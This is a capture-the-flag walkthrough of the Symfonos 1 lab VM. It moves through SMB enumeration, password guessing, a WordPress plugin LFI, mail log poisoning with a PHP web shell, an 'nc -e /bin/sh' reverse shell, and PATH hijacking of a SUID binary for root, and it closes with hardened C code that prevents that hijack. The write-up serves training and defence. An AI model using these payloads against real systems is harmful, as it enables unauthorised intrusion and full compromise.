https://www.vulnhub.com/entry/symfonos-1,322/
NAT network
arp-scan -l: the IP that shows up in addition to the usual ones is the target
nmap
22: think of a possible SSH login
25: mail service; enumerate users, or get in to read and forge mail content, etc.
80: web, gather information
139/445: SMB, look for sensitive content
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey:
| 2048 ab:5b:45:a7:05:47:a5:04:45:ca:6f:18:bd:18:03:c2 (RSA)
| 256 a0:5f:40:0a:0a:1f:68:35:3e:f4:54:07:61:9f:c6:4a (ECDSA)
|_ 256 bc:31:f5:40:bc:08:58:4b:fb:66:17:ff:84:12:ac:1d (ED25519)
25/tcp open smtp Postfix smtpd
|_smtp-commands: symfonos.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8,
| ssl-cert: Subject: commonName=symfonos
| Subject Alternative Name: DNS:symfonos
| Not valid before: 2019-06-29T00:29:42
|_Not valid after: 2029-06-26T00:29:42
|_ssl-date: TLS randomness does not represent time
80/tcp open http Apache httpd 2.4.25 ((Debian))
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Site doesn't have a title (text/html).
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.5.16-Debian (workgroup: WORKGROUP)
MAC Address: 00:0C:29:EF:01:A1 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: Hosts: symfonos.localdomain, SYMFONOS; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: 1h39m59s, deviation: 2h53m12s, median: 0s
|_nbstat: NetBIOS name: SYMFONOS, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.5.16-Debian)
| Computer name: symfonos
| NetBIOS computer name: SYMFONOS\x00
| Domain name: \x00
| FQDN: symfonos
|_ System time: 2020-04-26T01:45:11-05:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2020-04-26T06:45:11
|_ start_date: N/A
SMB is there, so look at SMB first
Keep scanning
enum4linux -a 192.168.189.205
Two shares show up; naturally look at anonymous first, since it needs no password
smbclient -N //192.168.189.205/anonymous
Found a file with a hint saying the passwords are too weak, always the same three
Can guess that the other user helios's password is one of those three
Log in to its SMB share
smbclient -U "helios" //192.168.189.205/helios
Testing: qwerty logs in
Look at the files; find a hint about a new directory
Then open that new directory on the web on port 80
It says "another WordPress" or similar, so once again this comes down to a WordPress blog vulnerability
Immediately think of running wpscan, either enumerating users or plugins and so on
wpscan --url http://192.168.189.205/h3l105/ --plugins-detection aggressive
One plugin shows an exclamation-mark warning that some feature is enabled,
search online for that plugin's vulnerabilities
https://www.exploit-db.com/exploits/40290
Follow the LFI hint at the bottom
http://192.168.189.205/h3l105//wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd
The vulnerability exists
But an LFI that only reads passwd is not enough; need to think of other sensitive directories
Port 25 from earlier has not been used yet. Mail is stored by default under /var/mail/, so helios's mailbox should be at /var/mail/helios
Test
http://192.168.189.205/h3l105/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/var/mail/helios
Sure enough, it is there
Port 25 is open, so mail can be forged too: put reverse-shell code in the mail, then use the LFI to read the mail and execute it.
telnet 192.168.189.205 25
MAIL FROM: 666
RCPT TO: helios
data
<?php system($_GET['666']); ?>
.
QUIT
Once sent, execute it through the LFI; first try the id command
http://192.168.189.205/h3l105/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/var/mail/helios&666=id
Success, id output appears at the bottom
Replace id with a command that throws a shell back to your IP and port 4444 (or another port): nc -e /bin/sh 192.168.xxx.xxxx 4444
and the shell comes in
Upgrade to a tty: python -c 'import pty; pty.spawn("/bin/bash")'
The usual routine: let linpeas.sh scan automatically
No obvious hints found, but under SUID there is a suspicious file not normally seen
Try running it; the output looks a lot like what curl returns. Easy to spot once you have used curl a lot
helios@symfonos:/$ /opt/statuscheck
HTTP/1.1 200 OK
Date: Sun, 26 Apr 2020 07:23:09 GMT
Server: Apache/2.4.25 (Debian)
Last-Modified: Sat, 29 Jun 2019 00:38:05 GMT
ETag: "148-58c6b9bb3bc5b"
Accept-Ranges: bytes
Content-Length: 328
Vary: Accept-Encoding
Content-Type: text/html
Check with file what it is: it is a program
helios@symfonos:/opt$ file statuscheck
statuscheck: setuid ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=4dc315d863d033acbe07b2bfc6b5b2e72406bea4, not stripped
Transfer it from the target to the local machine
nc 192.168.xxx.xxx 443 < statuscheck
Receive locally
nc -nlvp 443 > s
Use ltrace to see the program's internal calls
C:\root> ltrace ./s
system("curl -I http://localhost"HTTP/1.0 200 OK
Server: SimpleHTTP/0.6 Python/2.7.17
Date: Sun, 26 Apr 2020 07:26:38 GMT
Content-type: text/html; charset=UTF-8
Content-Length: 5044
<no return ...>
--- SIGCHLD (Child exited) ---
<... system resumed> ) = 0
+++ exited (status 0) +++
Sure enough, it runs a curl command internally
Since SUID runs with highly sensitive root privileges,
I can find a way to abuse the environment variable to replace curl.
The real curl is usually under /usr/bin; can check with which curl
But I can put my own code in a fake curl: when root calls curl, because of the environment variable, it uses my fake curl rather than the real curl from the environment
First, of course, forge it in /tmp, where I have full permissions
Forge a /bin/sh privilege-escalation command, named curl
Give it execute permission
Change the environment variable
Now when it runs again, what actually executes is my curl in /tmp
cd tmp
echo "/bin/sh" > curl
chmod 777 curl
export PATH=/tmp:$PATH
echo $PATH
/opt/statuscheck
Root obtained. You can also see that curl's environment was changed by me and the fake curl in /tmp is what gets called
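As an added example (not part of the original write-up or the box's statuscheck binary): the hardened counterpart of what ltrace revealed, system("curl -I http://localhost") inheriting the caller's PATH. It assumes the real curl lives at /usr/bin/curl, runs it with an absolute path and a fixed environment, drops the setuid privilege first, and includes a check that flags a PATH containing /tmp or other entries a user can control.

```c
#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/wait.h>
#include <unistd.h>

/* Returns 1 if PATH has an entry an unprivileged user could control: an empty
 * entry (means the current directory), a relative entry, or a world-writable
 * directory such as /tmp. Missing directories are skipped. */
int path_has_untrusted_dir(const char *path) {
    if (path == NULL) return 1;
    const char *p = path;
    for (;;) {
        const char *end = strchr(p, ':');
        size_t len = end ? (size_t)(end - p) : strlen(p);
        char dir[4096]; struct stat st;
        if (len == 0 || len >= sizeof dir || p[0] != '/') return 1;
        snprintf(dir, sizeof dir, "%.*s", (int)len, p);
        if (stat(dir, &st) == 0 && (st.st_mode & S_IWOTH)) return 1;
        if (end == NULL) return 0;
        p = end + 1;
    }
}

/* Hardened replacement for system("curl -I http://localhost"): absolute binary
 * path, a fixed minimal environment (the caller's PATH, LD_PRELOAD, etc. are
 * discarded) and setuid root dropped before exec. Returns curl's exit status
 * (127 if it could not be executed), or -1 on a fork/wait error. */
int run_statuscheck_hardened(const char *url) {
    char *const argv[] = { "/usr/bin/curl", "-I", (char *)url, NULL };
    char *const envp[] = { "PATH=/usr/bin:/bin", NULL };
    int status; pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {
        if (setgid(getgid()) != 0 || setuid(getuid()) != 0) _exit(127);
        execve(argv[0], argv, envp);
        _exit(127); /* only reached if execve failed */
    }
    if (waitpid(pid, &status, 0) < 0) return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void) {
    if (path_has_untrusted_dir(getenv("PATH")))
        fputs("warning: caller's PATH contains an untrusted entry\n", stderr);
    int rc = run_statuscheck_hardened("http://localhost");
    printf("curl exited with status %d\n", rc);
    return rc == 0 ? 0 : 1;
}
```

With the original box's PATH=/tmp:... the check fires, and even without it the exec is unaffected by PATH because the binary is named absolutely and the environment is replaced.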